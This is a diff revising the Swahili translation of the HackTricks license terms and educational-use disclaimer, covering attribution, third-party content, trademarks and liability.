-- Kushiriki — kunakili na kusambaza tena nyenzo kwa njia yoyote au umbizo wowote.
-- Kurekebisha — kuchanganya upya, kubadilisha, na kujenga juu ya nyenzo.
+- Attribution: Una uhuru wa:
+- Share — nakili na usambaze tena nyenzo kwa njia yoyote au muundo wowote.
+- Adapt — remix, badilisha, na ujengwa juu ya nyenzo.
 
 #### Masharti ya Ziada:
 
-- Yaliyomo ya Wahusika Wengine: Sehemu kadhaa za blogi/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vipande kutoka blogi nyingine au machapisho. Matumizi ya maudhui kama haya yanafanywa chini ya kanuni za fair use au kwa idhini ya wazi kutoka kwa wamiliki wa hakimiliki husika. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni kuhusu maudhui ya wahusika wengine.
-- Uandishi: Maudhui ya awali yaliyotungwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi wakati wa kushiriki au kurekebisha kazi hii.
+- Maudhui ya Watu wa tatu: Sehemu kadhaa za blogu/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vifupi kutoka blogu au machapisho mengine. Matumizi ya maudhui kama hayo hufanywa kwa misingi ya matumizi ya haki au kwa ruhusa maalum kutoka kwa wamiliki wa hakimiliki. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni zinazohusu maudhui ya watu wa tatu.
+- Uandishi: Yaliyomo ya asili yaliyoandikwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi unaposhiriki au kubadilisha kazi hii.
 
 #### Msamaha:
 
-- Matumizi ya Kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya maudhui haya, tafadhali wasiliana nami.
+- Matumizi ya kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya yaliyomo haya, tafadhali wasiliana nami.
 
-Leseni hii hawaitoi haki yoyote ya alama za biashara au haki za chapa kuhusiana na maudhui. Alama zote za biashara na chapa zilizotajwa katika blogi/kitabu hiki ni mali ya wamiliki wao mtawaliwa.
+Leseni hii haisomi kama inakupa haki za alama za biashara au umuhimu wa chapa kuhusiana na yaliyomo. Alama zote za biashara na chapa zilizotajwa katika blogu/kitabu hiki ni mali ya wamiliki wao husika.
 
-**Kwa kuingia au kutumia HackTricks, unakubali kufuata masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali, usiingie kwenye tovuti hii.**
+**Kwa kufikia au kutumia HackTricks, unakubali kuzingatia masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali usifanyi matumizi ya tovuti hii.**
 
-## **KIDOKEZO CHA KUTOHUSIKA**
+## **Disclaimer**
 
 > [!CAUTION]
-> Kitabu hiki, 'HackTricks,' kimetengenezwa kwa madhumuni ya elimu na taarifa tu. Maudhui ndani ya kitabu hiki yanatolewa kwa hali ya "kama yalivyo", na waandishi na wachapishaji hawatoa uwakilishi wala dhamana ya aina yoyote, iwe bayana au iliyotamkwa, kuhusu ukamilifu, usahihi, uimara, uwajibikaji, ubora, au upatikana wa taarifa, bidhaa, huduma, au michoro inayohusiana iliyomo katika kitabu hiki. Kila tegemezi unaloweka kwenye taarifa hizo ni kwa hatari yako wewe mwenyewe.
+> Kitabu hiki, 'HackTricks,' kimekusudiwa kwa madhumuni ya elimu na taarifa tu. Yaliyomo ndani ya kitabu hiki yanatolewa kwa msingi wa 'kama ilivyo', na waandishi na wachapishaji hawatoi uwakilishi wala dhamana ya aina yoyote, kwa wazi au kwa kauli, kuhusu ukamilifu, usahihi, uaminifu, ufaa, au upatikanaji wa habari, bidhaa, huduma, au michoro inayohusiana katika kitabu hiki. Kila utegemezi utakaoamuriwa juu ya habari hizo upo kwa hatari yako mwenyewe.
 >
-> Waandishi na wachapishaji hawatakuwa chini ya hatima yeyote walau ya hasara au uharibifu wowote, ikiwa ni pamoja na, bila kikomo, hasara za moja kwa moja au za matokeo, au hasara yoyote ile inayotokana na upotevu wa data au faida zinazotokana na, au kuhusiana na, matumizi ya kitabu hiki.
+> Waandishi na wachapishaji hawatajibu kwa hasara yoyote au uharibifu wowote, ikiwemo bila kikomo, hasara isiyo ya moja kwa moja au uharibifu wa matokeo, au hasara yoyote ile iliyosababishwa na upotevu wa data au faida inayotokana na, au kwa kuhusiana na, matumizi ya kitabu hiki.
 >
-> Zaidi ya hayo, mbinu na vidokezo vilivyoripotiwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na havipaswi kutumika kwa shughuli zozote haramu au zenye madhara. Waandishi na wachapishaji hawakubali wala kuunga mkono shughuli zozote haramu au zisizo za kimaadili, na matumizi yoyote ya taarifa zinazomo katika kitabu hiki ni kwa hatari na uamuzi wa mtumiaji.
+> Aidha, mbinu na vidokezo vilivyoelezwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na haviwezi kutumika kwa shughuli haramu au za uharibifu. Waandishi na wachapishaji hawapendelei wala kuunga mkono vitendo vyovyote haramu au visivyo vya maadili, na matumizi yoyote ya habari zilizo ndani ya kitabu hiki ni kwa hatari na uamuzi wa mtumiaji.
 >
-> Mtumiaji ndiye mwenye jukumu kamili kwa vitendo vyovyote anavyochukua kwa msingi wa taarifa zilizomo ndani ya kitabu hiki, na anapaswa kila wakati kutafuta ushauri wa kitaalamu na msaada wakati anajaribu kutekeleza mbinu au vidokezo vilivyotajwa hapa.
+> Mtumiaji ndiye mwenye jukumu kikamilifu kwa hatua zozote zitakazochukuliwa kutokana na habari zilizo katika kitabu hiki, na anapaswa kila wakati kutafuta ushauri na msaada wa mtaalamu anapojaribu kutekeleza mbinu au vidokezo vilivyoelezwa hapa.
 >
-> Kwa kutumia kitabu hiki, mtumiaji anakubali kumwachilia waandishi na wachapishaji kutoka kwa uzito wowote wa dhamana na uwajibikaji kwa uharibifu, hasara, au madhara yanayoweza kutokea kutokana na matumizi ya kitabu hiki au taarifa zilizomo ndani yake.
+> Kwa kutumia kitabu hiki, mtumiaji anakubali kumtolea waandishi na wachapishaji dhamana na wajibu wowote kwa hasara, uharibifu, au madhara yatakayoweza kutokana na matumizi ya kitabu hiki au habari yoyote iliyomo ndani yake.
 
 {{#include ../banners/hacktricks-training.md}}